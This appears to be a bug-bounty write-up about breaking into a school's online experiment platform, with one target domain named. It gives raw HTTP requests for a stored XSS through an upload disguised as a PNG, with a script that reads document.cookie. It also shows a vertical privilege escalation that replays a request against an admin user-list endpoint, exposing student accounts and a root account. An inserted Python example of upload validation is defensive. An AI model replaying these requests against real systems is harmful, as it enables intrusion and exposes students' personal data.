http://xxxxxx/login
http://xxxxxxxxxxxxx/guidance/464
http://xxxxx/dialog/content/editor?type=new
http://xxxxxxxx/dialog/content/editor?type=new
At this upload endpoint, send an upload request whose file body is an XSS payload:
POST /api/static/upload/experiment/file?experimentId=9 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------38011060979487556742390084841
Content-Length: 254
Connection: close

-----------------------------38011060979487556742390084841
Content-Disposition: form-data; name="file"; filename="9.html"
Content-Type: image/png

<script>alert(document.cookie)</script>
-----------------------------38011060979487556742390084841--
Then open the stored file at this URL:
http://xxxxxxxxxx/api/static/resources/data/huel-fm/home/20230805091624-9.html
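The upload above is accepted because the server trusts the declared Content-Type and the extension, then serves the file back from the application origin. Below is an added example (not the vendor's code) of the server-side checks that would have rejected it: an extension allowlist, a magic-byte check against the declared type, and headers that stop the stored file from being rendered as a page. The allowlist, helper names and response headers are assumptions.

```python
import re
from typing import Dict, Tuple

# Allowlist: extension -> (expected MIME type, leading magic bytes). Assumed set.
ALLOWED_TYPES = {
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    "jpg": ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "pdf": ("application/pdf", b"%PDF-"),
}

# Simple safe filename: no path separators, one extension.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.[A-Za-z0-9]{1,8}$")


def validate_upload(filename: str, declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason). The client-supplied Content-Type is never trusted alone."""
    if not SAFE_NAME.match(filename):
        return False, "rejected: unsafe filename"
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, f"rejected: extension .{ext} not allowed"
    mime, magic = ALLOWED_TYPES[ext]
    # Declared type must agree with the extension (strip any charset parameter).
    if declared_type.split(";")[0].strip().lower() != mime:
        return False, "rejected: declared Content-Type does not match extension"
    # File body must carry the magic bytes of the type it claims to be.
    if not data.startswith(magic):
        return False, "rejected: file content does not match declared type"
    return True, f"accepted as {mime}"


def download_headers(filename: str) -> Dict[str, str]:
    """Headers for serving a validated upload so it is never executed as HTML in the app origin."""
    mime = ALLOWED_TYPES[filename.rsplit(".", 1)[1].lower()][0]
    return {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",          # no browser type sniffing
        "Content-Disposition": f'attachment; filename="{filename}"',
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    # Constructed inputs: the page's 9.html payload versus a minimal real PNG header.
    print(validate_upload("9.html", "image/png", b"<script>alert(document.cookie)</script>"))
    print(validate_upload("9.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```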
The data here is also worthwhile:
http://huel-fm.digquant.com/login
This site holds the account information of every student in the school.
Capture this request:
POST /api/user/admin/get/list HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 117
Connection: close

{"experimentId":9,"pageIndex":2,"showItem":10,"collegeName":"","majorName":"","className":"","grade":"","userRole":1}
Capture another request:
POST /api/experiment/report/self/newest/info HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 2
Connection: close

{}
Replace the endpoint with /api/user/admin/get/list.
Not only did the vertical privilege escalation succeed, it also leaked the root account; with a teacher-level account, by contrast, no root account was leaked.
From this one site alone: unauthorized access 2 points + XSS 1 point + accounts 2 points + privilege escalation 2 points, seven points in total.
Originally published on the WeChat public account 湘安无事: "记一次edu单个站点斩获7rank" (Notes on a single edu site that netted 7 rank).